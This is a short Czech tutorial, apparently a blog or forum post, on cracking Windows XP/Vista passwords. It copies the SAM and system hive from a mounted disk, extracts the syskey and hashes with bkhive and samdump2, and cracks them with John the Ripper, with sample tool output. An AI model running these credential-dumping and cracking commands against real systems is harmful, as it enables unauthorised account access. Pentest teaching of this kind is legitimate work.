Ve fóru jsem slíbil rozepsat téma – prolomení hesla v příkazové řádce. Nejedná se o nic překotného. V dalším textu bude popsán crack Windows XP a Windows Vista HASHe a crack složitějších hesel pomocí jednoduchého clusteru. Tato krátka stať je pouze z důvodu kontinua. V širších souvislostech je téma aktuálnější než se zdá, zejména v době kdy se začíná seriózně hledat fungující řešení pro pentesting WPA zabezpečení. Padla první seriózní zmínka o nasazení implementace Pico Computingu v pentest Linux distribuci BackTrack. Refresh..
Notorický známé příkazy, postup pro získání a crack SAM a syskey z operačního systému Microsoft Windows pomocí slovníkového útoku nebo bruteforce útoku.. Aplikace bkhlive a samdump2 existují již dlouho.
bkhlive
bkhive /mnt/sda3/WINDOWS/system32/config/system uloz-syskey.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 88ca2e3c7352451edf7ffa9d73514348
nebo
cd /mnt/sda3/WINDOWS/system32/config/
cp SAM /tmp
cp system /tmp
bkhive system key > /tmp/key
samdump2 sam /tmp/key > /tmp/hash.txt
samdump2
samdump2 /mnt/sda3/WINDOWS/system32/config/SAM uloz-syskey.txt>hashe-hesel.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
Root Key : SAM
Brute force útok na heslo
./john /root/hashe-hesel.txt -i:all
Slovníkový útok na heslo
./john -w slovník /root/hashe-hesel.txt -i:all
BootDisk Offline Recovery
Je Linux floppy nebo disk image distribuce pro změnu hesla administrátora nebo editaci registrů v operčním systému Microsoft Windows. ISO můžete stahovat z webu eunet. Live CD je podrobně popsáno zde.
Cluster Knoppix
Webová stránka a popsáno v dalším textu – odkazna článek bude doplněn.
